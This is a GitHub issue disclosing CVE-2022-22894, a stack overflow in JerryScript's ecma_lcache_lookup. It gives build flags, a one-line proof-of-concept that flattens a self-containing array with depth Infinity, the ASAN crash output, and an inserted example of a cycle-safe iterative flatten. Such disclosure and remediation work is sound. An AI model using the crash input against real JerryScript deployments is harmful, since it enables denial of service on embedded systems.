CVE-2022-22894: Stack-overflow in ecma_lcache_lookup (ecma-lcache.c) · Issue #4890 · jerryscript-project/jerryscript
JerryScript 3.0.0 was discovered to contain a stack overflow via ecma_lcache_lookup in /jerry-core/ecma/base/ecma-lcache.c.
JerryScript revision
Commit: 51da1551
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20
Test case
let array = new Array(1); array.splice(1, 0, array); array.flat(Infinity);
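The test case builds an array that contains itself and then asks for an unbounded flatten, so a flatten that recurses once per nesting level never reaches a base case and walks the native stack until it overflows. The following is an added example, not JerryScript code, of how a flatten routine avoids that failure mode: it keeps its own work stack instead of recursing, skips holes the way Array.prototype.flat does, and tracks the arrays on the current path so a cycle is reported as an error instead of consuming the stack. The names safeFlat, buildCyclicArray and flattenResult are this example's own.

```javascript
// Added example (not JerryScript's implementation): a flatten that cannot be
// driven into unbounded native recursion by the shape of its input.
//
// FlattenIntoArray in the spec descends once per nested array level. With
// depth Infinity and an array that contains itself, the nesting never ends,
// so a naive recursive implementation exhausts the native stack. Two guards
// remove that dependency on input shape: an explicit work stack (so nesting
// depth costs heap, not native stack frames) and a set of arrays currently on
// the path (so a cycle is detected the moment it closes).
function safeFlat(source, depth = 1) {
  const target = [];
  const onPath = new Set([source]);           // arrays being expanded right now
  // One frame per array being walked: the array, the next index, and how many
  // more levels may still be flattened below it. Infinity - 1 stays Infinity.
  const stack = [{ arr: source, index: 0, remaining: depth }];

  while (stack.length > 0) {
    const frame = stack[stack.length - 1];
    if (frame.index >= frame.arr.length) {
      stack.pop();                            // finished this array
      onPath.delete(frame.arr);               // it is no longer on the path
      continue;
    }
    const i = frame.index++;
    if (!(i in frame.arr)) continue;          // skip holes, as flat() does
    const el = frame.arr[i];
    if (Array.isArray(el) && frame.remaining > 0) {
      if (onPath.has(el)) {
        // The element is an array we are already inside: the structure is
        // cyclic, and flattening it has no finite result.
        throw new TypeError("cyclic array cannot be flattened");
      }
      onPath.add(el);
      stack.push({ arr: el, index: 0, remaining: frame.remaining - 1 });
    } else {
      target.push(el);
    }
  }
  return target;
}

// Constructed input: the self-containing array from the test case above.
function buildCyclicArray() {
  const array = new Array(1);
  array.splice(1, 0, array);                  // array is now [ <hole>, array ]
  return array;
}

// Wraps safeFlat so callers get a result object instead of an exception.
function flattenResult(arr, depth) {
  try {
    return { ok: true, value: safeFlat(arr, depth) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// Usage: the cyclic input is rejected; a benign nested array flattens normally.
console.log(flattenResult(buildCyclicArray(), Infinity));
console.log(flattenResult([1, [2, [3, [4]]]], Infinity));
```

The same array appearing twice at different positions (for example `[b, b]`) is not a cycle, and the path set handles that correctly because an array is removed from it as soon as its frame is popped; only an array reached again while it is still being expanded is treated as cyclic.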
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ASAN:DEADLYSIGNAL
==26613==ERROR: AddressSanitizer: stack-overflow on address 0xff535ffc (pc 0x5661347c bp 0xff536090 sp 0xff536000 T0)
    #0 0x5661347b in ecma_lcache_lookup /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144
    #1 0x569cde1f (/root/jerryscript/build/bin/jerry+0x477e1f)
SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144 in ecma_lcache_lookup
==26613==ABORTING
Credits: Found by OWL337 team.